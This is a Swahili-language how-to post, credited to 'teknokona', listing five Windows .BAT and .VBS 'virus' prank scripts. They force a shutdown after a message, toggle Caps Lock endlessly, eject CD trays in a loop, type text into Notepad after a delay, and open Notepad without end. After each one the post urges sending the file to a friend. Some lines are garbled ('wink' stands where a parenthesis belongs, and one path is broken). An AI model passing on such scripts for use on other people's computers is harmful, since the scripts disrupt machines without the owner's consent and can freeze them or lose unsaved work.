Karibu Net TAMADUNI.Fungua programu ya Notepad kisha fuata maelekezo haya, kumbuka unapotaka lisevu faili husika unaweza chagua jina lolote ila ni lazima umalizie na nukta kisha BAT (.BAT) au nukta VBS (.VBS) fuata maelekezo yote;
*1. Kirusi unachoweza weka meseji yeyote ya utani kisha kinazima kompyuta:*
Andika :
@echo off
msg * Habari rafiki
shutdown -c "Error! Kompyuta Imegoma Leo!" -s
Kisha hifadhi (save) kama “jinalolote.BAT” ata kwenye ‘Desktop’ au ‘My
Documents’ kisha unaweza jaribu au kumtumia rafiki unayetaka mtania.
*2. Kulazimisha Uchaguzi wa ‘Caps Lock’ kwenye Kibodi (Keyboard)
Usioweza Kutolewa.* (Inalazimisha mtu kutumia herufi kubwa tuu)
ANDIKA;
Set wshShell =wscript.CreateObject("WScript.Shell"
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Kisha hifadhi (save) kama “jinalolote.VBS” ata kwenye ‘Desktop’ au ‘My
Documents’ kisha unaweza jaribu au kumtumia rafiki unayetaka mtania.
*3. Ejekti deki ya CD au DVD ya laptop au kompyuta yeyote, ata kama zipo
zaidi ya moja zote zitafunguka.* Ata kama zikifungwa baada ya muda
kidogo zitafunguka tena.
ANDIKA;
Set oWMP = CreateObject("WMPlayer.OCX.7"wink
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Kisha hifadhi (save) kama “jinalolote.VBS” ata kwenye ‘Desktop’ au ‘My
Documents’ kisha unaweza jaribu au kumtumia rafiki unayetaka mtania.
*4. Hii itafanya Notepad ifunguke bila kufunguliwa na kuandika ujumbe
ufuatao kwenye kompyuta husika “Hello, how are you? I am good thanks”.*
Unaweza badili maneno hayo kiustaa kwa kubadilisha badilisha herufi za
maneno hayo katika kodi(code) hii
ANDIKA;
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell"wink
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Kisha hifadhi (save) kama "jinalolote.VBS" ata kwenye 'Desktop' au 'My Documents' kisha unaweza jaribu au kumtumia rafiki unayetaka mtania.
*5. Kirusi huyu atafanya Notepad ifunguliwe mara kibao kuliko uwezo wa
mtu kuzifunga. *
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Kisha hifadhi (save) kama “jinalolote.BAT” ata kwenye ‘Desktop’ au ‘My
Documents’
Source teknokona